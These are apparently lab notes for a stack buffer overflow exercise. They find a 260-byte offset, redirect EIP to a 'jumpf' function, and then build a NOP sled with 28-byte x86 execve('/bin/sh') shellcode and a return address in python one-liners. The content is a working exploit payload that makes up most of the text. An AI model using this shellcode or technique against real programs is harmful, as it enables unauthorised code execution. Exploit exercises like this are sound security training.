
Index = 260


/* In order to see the registers */

 `python -c 'print "A" * 260 + "BBBB"'`

crash!!! if you type info registers
you should see the ebp (base pointer) full with 'A' (0x41)
and the eip (instruction pointer) full with 'B' (0x42)

disassemble jumpf in order to see the entry point of the function

jumpf entry: 0x08048ee0

lets make the address in bytes. whatch out about endianess!!!

"\xe0\x8e\x04\x08"

so.. the exploit becomes like...

`python -c 'print "A" * 260 + "\xe0\x8e\x04\x08"'`

Cool! Let's do something more interesting...

ShellCode = "\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89" + "\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"

The shellCode is 28 bytes long.

we have to find out the buffer address in order to jump inside.

return into buffer address: 0xffffcdac

0x80c5975

"\x75\x59\x0c\x08"


`python -c 'print "\x90" * 232 + "\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89" + "\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"  + "\x75\x59\x0c\x08"'`
